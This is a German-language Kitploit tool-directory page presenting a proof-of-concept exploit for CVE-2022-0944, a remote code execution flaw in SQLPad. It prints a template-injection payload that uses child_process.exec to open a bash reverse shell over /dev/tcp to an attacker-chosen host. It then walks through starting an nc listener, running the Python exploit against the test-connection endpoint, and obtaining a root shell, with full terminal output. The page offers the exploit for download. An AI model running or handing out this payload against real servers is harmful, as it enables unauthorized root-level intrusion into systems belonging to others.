Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-0944 — PoC für RCE in SQLPad (CVE-2022-0944) | Kitploit
Tools/GitHubGitHub/toneillcodes/cve-2022-0944
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingPayload-Entwicklung
GitHubtoneillcodes/cve-2022-0944

CVE-2022-0944

PoC für RCE in SQLPad (CVE-2022-0944)

Repository anzeigen
1vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2022-0944 PoC

PoC für RCE in SQLPad.
Dieses Beispiel startet eine Reverse Shell, aber das Payload kann geändert werden, um jeden verfügbaren Befehl auszuführen, indem der Befehl im 'exec'-Aufruf innerhalb des Payloads geändert wird.
payload = f"{{{{ process.mainModule.require('child_process').exec('/bin/bash -c "bash -i >& /dev/tcp/{reverse_host}/{reverse_port} 0>&1"') }}}}"

Voraussetzungen

Python 3

Verwendung

  1. Einen Listener starten
root@kitploit:~
┌──(kali㉿hammer)-[~/dev/cve-2022-0944]
└─$ nc -lvkp 7070
listening on [any] 7070 ...
  1. Exploit ausführen
root@kitploit:~
┌──(kali㉿hammer)-[~/dev/cve-2022-0944]
└─$ python poc-cve-2022-0944.py -u http://sqlpad.example.com/api/test-connection -a 10.10.11.208 -p 7070
[*] Running exploit gegen Ziel: http://sqlpad.example.com/api/test-connection
[*] Erstelle JSON mit Payload
[*] Sende Anfrage...
[!] Exploit scheint erfolgreich gewesen zu sein.
[*] Fertig.

┌──(kali㉿hammer)-[~/dev/cve-2022-0944]
└─$
  1. Nach einer Shell suchen
root@kitploit:~
┌──(kali㉿hammer)-[~/dev/cve-2022-0944]
└─$ nc -lvkp 7070
listening on [any] 7070 ...
connect to [10.10.11.208] from example.com [10.10.11.25] 45502
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@c184118df0a6:/var/lib/sqlpad# id
uid=0(root) gid=0(root) groups=0(root)
root@c184118df0a6:/var/lib/sqlpad#
Tool herunterladen

Referenzen

https://nvd.nist.gov/vuln/detail/CVE-2022-0944
https://huntr.com/bounties/46630727-d923-4444-a421-537ecd63e7fb